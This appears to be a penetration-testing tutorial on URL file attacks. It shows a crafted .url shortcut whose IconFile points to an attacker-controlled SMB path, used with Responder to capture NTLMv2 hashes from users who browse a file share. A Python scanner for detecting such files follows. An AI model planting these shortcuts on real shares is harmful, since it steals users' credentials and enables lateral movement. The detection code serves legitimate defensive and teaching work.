URL File Attacks

PRACTICE ! PRACTICE ! PRACTICE !

Let's imagine we've compromised a user, and this user has some sort of shared access, for example access to a file share.

  • We can use Responder to capture more hashes and move laterally to a higher-privileged user

  • So in order for the victim to open our payload, we'll have to craft our own malicious text file, Word document, etc. Treat this as a phishing attack!

# Save this file in the form of "@something.url" OR "~something.url"

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\<ATTACKER IP>\%USERNAME%.icon
IconIndex=1

Now let's run Responder with the default settings (SMB and HTTP must be turned on)

  • Visiting the shared folder "HackMe" returns fcastle's NTLMv2 hash
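From the defender's side, the file above is easy to hunt for: it is a `.url` shortcut whose `IconFile` (or another path key) points at a remote host. The following is an added example, not part of the original page. It walks a share and reports such files; the function names, the `allowed_hosts` parameter and the sample address 192.0.2.10 are assumptions made for illustration.

```python
import os
import re
import sys

# Keys in an [InternetShortcut] file whose value may be resolved as a path.
PATH_KEYS = {"iconfile", "url", "workingdirectory"}
# UNC path (\\host\share or //host/share) or file://host/... URL.
REMOTE = re.compile(r"^(?:\\\\|//)(?P<host>[^\\/]+)|^file://(?P<fhost>[^\\/]+)", re.I)

# Constructed sample: same layout as the file above, with a documentation IP (RFC 5737).
SAMPLE = "[InternetShortcut]\nURL=blah\nWorkingDirectory=blah\nIconFile=\\\\192.0.2.10\\%USERNAME%.icon\nIconIndex=1\n"


def remote_references(text):
    """Return [(key, value, host)] for every path key that points at a remote host."""
    hits = []
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if not sep or key.strip().lower() not in PATH_KEYS:
            continue
        m = REMOTE.match(value.strip())
        if m:
            hits.append((key.strip(), value.strip(), m.group("host") or m.group("fhost")))
    return hits


def scan_share(root, allowed_hosts=()):
    """Walk a share and report .url files referencing hosts outside allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".url"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                raw = fh.read()
            # .url files are usually ANSI, sometimes UTF-16 with a BOM.
            text = raw.decode("utf-16" if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else "latin-1")
            for key, value, host in remote_references(text):
                if host.lower() not in allowed:
                    findings.append((path, key, value, host))
    return findings


if __name__ == "__main__":
    print(remote_references(SAMPLE))
    for finding in scan_share(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*finding, sep=" | ")
```

Pass the share's mount point as the first argument; list legitimate internal file servers in `allowed_hosts` so that only unexpected hosts are reported.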
